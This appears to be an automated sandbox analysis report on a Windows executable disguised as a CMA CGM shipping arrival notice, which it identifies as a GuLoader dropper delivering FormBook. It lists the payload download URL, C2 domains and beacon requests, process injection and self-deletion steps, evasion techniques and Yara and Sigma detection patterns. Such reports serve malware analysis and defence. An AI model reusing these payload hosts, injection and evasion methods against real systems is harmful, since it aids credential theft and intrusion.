Loading ...

Play interactive tourEdit tour

Windows Analysis Report NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe

Overview

General Information

Sample Name:NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
Analysis ID:482590
MD5:e8bceea59b2074bd08bf68ab55ecdf3e
SHA1:8b62bf811b03fe25924ef6ff4d4afd89c902f7cd
SHA256:0b4684d82509a6e7e0c1cb63174bf68d182ccff75a3d19f16821127605d636b8
Tags:exe
Infos:

Most interesting Screenshot:

Detection

GuLoader FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Initial sample is a PE file and has a suspicious name
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
PE file contains strange resources
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe (PID: 7032 cmdline: 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe' MD5: E8BCEEA59B2074BD08BF68AB55ECDF3E)
    • NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe (PID: 6396 cmdline: 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe' MD5: E8BCEEA59B2074BD08BF68AB55ECDF3E)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 5228 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 6200 cmdline: /c del 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.acooll.com/kbl2/"], "decoy": ["beckyhartpcpublishers.com", "durangosouladventures.com", "taylormakeyourlife.com", "vs88333.com", "electromoto.net", "kratusconsultoria.com", "ecolightingsolution.com", "changethenarrowtive.com", "interpunctto.com", "thelogicsticks.com", "priorpublic.com", "altamirasound.com", "zx136.com", "everythingswallow.com", "rlmwebcreations.com", "zogaripet.com", "stewco360.com", "cassiwalsh.com", "syst.taipei", "thefairwaywithin.com", "barrows66.online", "tablebarn.net", "gabrielladasilva.com", "anqiu.tech", "store504.com", "findmytribe.online", "hrlaboris.com", "packetin.com", "managinginit.com", "sfseminars.com", "evieguest.com", "toptanbezmaske.com", "veryzocn.com", "frendapp.net", "maraging-trade.com", "allinonemigration.com", "waifufood.com", "advancepestcontrol.website", "onetimerecovery.com", "theranchsmokehouse.com", "executivehomefinance.com", "gotothisnotary.com", "tousentrepreneur.com", "flow-dynamics.online", "open-numeric-center.com", "itonlylookshard.com", "losangelescustomupholstery.com", "wichitavillagefleamarket.com", "tigerlottotips.com", "videoquests.com", "osdentalcol.com", "easypercetakan.com", "havensretreatspa.com", "7-fwd.com", "bumbles.online", "microsoftjob.com", "wxsjykj.com", "numberoneratedinfiveg.com", "taylorservewest.com", "normalblue.com", "yes2synergy.com", "dominionhavanese.com", "tranmanh.net", "tanja-wenzel.com"]}

Threatname: GuLoader

{"Payload URL": "https://www.paulassinkarchitect.nl/bin_fDiyu115.bin"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.1747108228.0000000004D6F000.00000004.00020000.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
  • 0x1a508:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 21 entries

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
      Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3424, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 5228
      Sigma detected: Suspicious Rundll32 Without Any CommandLine ParamsShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3424, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 5228

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeMalware Configuration Extractor: GuLoader {"Payload URL": "https://www.paulassinkarchitect.nl/bin_fDiyu115.bin"}
      Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.acooll.com/kbl2/"], "decoy": ["beckyhartpcpublishers.com", "durangosouladventures.com", "taylormakeyourlife.com", "vs88333.com", "electromoto.net", "kratusconsultoria.com", "ecolightingsolution.com", "changethenarrowtive.com", "interpunctto.com", "thelogicsticks.com", "priorpublic.com", "altamirasound.com", "zx136.com", "everythingswallow.com", "rlmwebcreations.com", "zogaripet.com", "stewco360.com", "cassiwalsh.com", "syst.taipei", "thefairwaywithin.com", "barrows66.online", "tablebarn.net", "gabrielladasilva.com", "anqiu.tech", "store504.com", "findmytribe.online", "hrlaboris.com", "packetin.com", "managinginit.com", "sfseminars.com", "evieguest.com", "toptanbezmaske.com", "veryzocn.com", "frendapp.net", "maraging-trade.com", "allinonemigration.com", "waifufood.com", "advancepestcontrol.website", "onetimerecovery.com", "theranchsmokehouse.com", "executivehomefinance.com", "gotothisnotary.com", "tousentrepreneur.com", "flow-dynamics.online", "open-numeric-center.com", "itonlylookshard.com", "losangelescustomupholstery.com", "wichitavillagefleamarket.com", "tigerlottotips.com", "videoquests.com", "osdentalcol.com", "easypercetakan.com", "havensretreatspa.com", "7-fwd.com", "bumbles.online", "microsoftjob.com", "wxsjykj.com", "numberoneratedinfiveg.com", "taylorservewest.com", "normalblue.com", "yes2synergy.com", "dominionhavanese.com", "tranmanh.net", "tanja-wenzel.com"]}
      Multi AV Scanner detection for submitted fileShow sources
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeVirustotal: Detection: 25%Perma Link
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeReversingLabs: Detection: 18%
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORY
      Source: 14.2.rundll32.exe.a04480.0.unpackAvira: Label: TR/Dropper.Gen
      Source: 14.2.rundll32.exe.4d6f834.4.unpackAvira: Label: TR/Dropper.Gen
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: unknownHTTPS traffic detected: 91.184.0.38:443 -> 192.168.2.4:49817 version: TLS 1.2
      Source: Binary string: wntdll.pdbUGP source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1263512131.000000001E6FF000.00000040.00000001.sdmp, rundll32.exe, 0000000E.00000002.1746538018.0000000004840000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, rundll32.exe
      Source: Binary string: rundll32.pdb source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258368762.00000000000D0000.00000040.00020000.sdmp
      Source: Binary string: rundll32.pdbGCTL source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258368762.00000000000D0000.00000040.00020000.sdmp

      Networking:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeNetwork Connect: 209.99.40.222 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 142.111.236.6 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.microsoftjob.com
      Source: C:\Windows\explorer.exeNetwork Connect: 160.153.136.3 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.wxsjykj.com
      Source: C:\Windows\explorer.exeDomain query: www.everythingswallow.com
      Source: C:\Windows\explorer.exeDomain query: www.acooll.com
      Source: C:\Windows\explorer.exeNetwork Connect: 44.227.76.166 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.priorpublic.com
      Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.117 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 54.65.172.3 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.taylormakeyourlife.com
      Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.beckyhartpcpublishers.com
      Source: C:\Windows\explorer.exeDomain query: www.rlmwebcreations.com
      Source: C:\Windows\explorer.exeDomain query: www.dominionhavanese.com
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: www.acooll.com/kbl2/
      Source: Malware configuration extractorURLs: https://www.paulassinkarchitect.nl/bin_fDiyu115.bin
      Source: Joe Sandbox ViewASN Name: SEDO-ASDE SEDO-ASDE
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=Uk/4fiNFIrAENImNkq5NhDo1aeiSVlAy2lomCsVKXqRgqDXOUaCk1Fhsw/s2uep8GWm3&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.everythingswallow.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=mNAOX+y4WXabTwndEsz1KZpSG28Pw83WrUohbTsiXwD/y5SMj6F01NR7fqmkJVRgJocs&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.priorpublic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=daE5tP1a5Tc9nw3OtdYckdcxhowCMZpeWCRMBVYqZOqgoniMKTEvOPxT2vVKGCSF49+A&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.taylormakeyourlife.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=ocgDBp8RB+Xp1FSN2g/g4Fu1UIpmvfcN211VFkYNpS2VJIx3qol2ed8JVuLDA1eIgF2c&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.rlmwebcreations.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=5OG5RXDxO3BYZOT/IvPQY/yLQe21T/UiDIo1icq4/yLbFOipVZEGR/EEpdeKVoDmItdG&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.beckyhartpcpublishers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=upAO5Ht9q/opBGhdUuHFjp2/wcU+ulAfJwkqIqPnAJrU/+6TNAZ9b0v5p0TfArP7uW32&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.microsoftjob.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=/SwPZpUeYcfjW+l1nZwpHh870fYqR0AAiYUZy0bqwmsGzS5J8V1b3P/tjC4QUhyDJ9qB&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.wxsjykj.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=JtyqbAMv8x4sWEmHDQcRdFhMiIOVFEssFVbQ4gFCjctfMjv3XBR0P1btq5GzI/zqaQLK&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.acooll.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 91.195.240.117 91.195.240.117
      Source: global trafficHTTP traffic detected: GET /bin_fDiyu115.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.paulassinkarchitect.nlCache-Control: no-cache
      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Sep 2021 21:01:26 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000003.1187824235.00000000009C6000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.2
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/arrow.png)
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/bodybg.png)
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/kwbg.jpg)
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/libg.png)
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/libgh.png)
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/logo.png)
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/search-icon.png)
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://www.rlmwebcreations.com
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://www.rlmwebcreations.com/10_Best_Mutual_Funds.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrO
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://www.rlmwebcreations.com/Anti_Wrinkle_Creams.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://www.rlmwebcreations.com/Best_Penny_Stocks.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3E
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://www.rlmwebcreations.com/Cheap_Air_Tickets.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3E
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://www.rlmwebcreations.com/Parental_Control.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3Er
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://www.rlmwebcreations.com/Top_Smart_Phones.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3Er
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://www.rlmwebcreations.com/display.cfm
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://www.rlmwebcreations.com/kbl2/?X8sl8h70=ocgDBp8RB
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: http://www.rlmwebcreations.com/song_lyrics.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3ErTA9i3
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: https://www.colorfulbox.jp/?adref=nsexp_ad&argument=DLHtsrgz&dmai=a5b5a809168886
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258590873.000000000098E000.00000004.00000020.sdmpString found in binary or memory: https://www.paulassinkarchitect.nl/
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258443374.0000000000740000.00000004.00000001.sdmpString found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.bin
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258523139.0000000000957000.00000004.00000020.sdmpString found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.bin7
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258523139.0000000000957000.00000004.00000020.sdmpString found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.bin?
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258523139.0000000000957000.00000004.00000020.sdmpString found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.binW
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258523139.0000000000957000.00000004.00000020.sdmpString found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.binqs
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258443374.0000000000740000.00000004.00000001.sdmpString found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.binwininet.dllMozilla/5.0
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: https://www.value-domain.com/
      Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmpString found in binary or memory: https://www.value-domain.com/modall.php
      Source: unknownDNS traffic detected: queries for: www.paulassinkarchitect.nl
      Source: global trafficHTTP traffic detected: GET /bin_fDiyu115.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.paulassinkarchitect.nlCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=Uk/4fiNFIrAENImNkq5NhDo1aeiSVlAy2lomCsVKXqRgqDXOUaCk1Fhsw/s2uep8GWm3&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.everythingswallow.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=mNAOX+y4WXabTwndEsz1KZpSG28Pw83WrUohbTsiXwD/y5SMj6F01NR7fqmkJVRgJocs&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.priorpublic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=daE5tP1a5Tc9nw3OtdYckdcxhowCMZpeWCRMBVYqZOqgoniMKTEvOPxT2vVKGCSF49+A&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.taylormakeyourlife.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=ocgDBp8RB+Xp1FSN2g/g4Fu1UIpmvfcN211VFkYNpS2VJIx3qol2ed8JVuLDA1eIgF2c&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.rlmwebcreations.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=5OG5RXDxO3BYZOT/IvPQY/yLQe21T/UiDIo1icq4/yLbFOipVZEGR/EEpdeKVoDmItdG&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.beckyhartpcpublishers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=upAO5Ht9q/opBGhdUuHFjp2/wcU+ulAfJwkqIqPnAJrU/+6TNAZ9b0v5p0TfArP7uW32&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.microsoftjob.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=/SwPZpUeYcfjW+l1nZwpHh870fYqR0AAiYUZy0bqwmsGzS5J8V1b3P/tjC4QUhyDJ9qB&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.wxsjykj.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /kbl2/?X8sl8h70=JtyqbAMv8x4sWEmHDQcRdFhMiIOVFEssFVbQ4gFCjctfMjv3XBR0P1btq5GzI/zqaQLK&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.acooll.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownHTTPS traffic detected: 91.184.0.38:443 -> 192.168.2.4:49817 version: TLS 1.2
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 00000000.00000002.929269162.00000000007BA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 0000000E.00000002.1747108228.0000000004D6F000.00000004.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
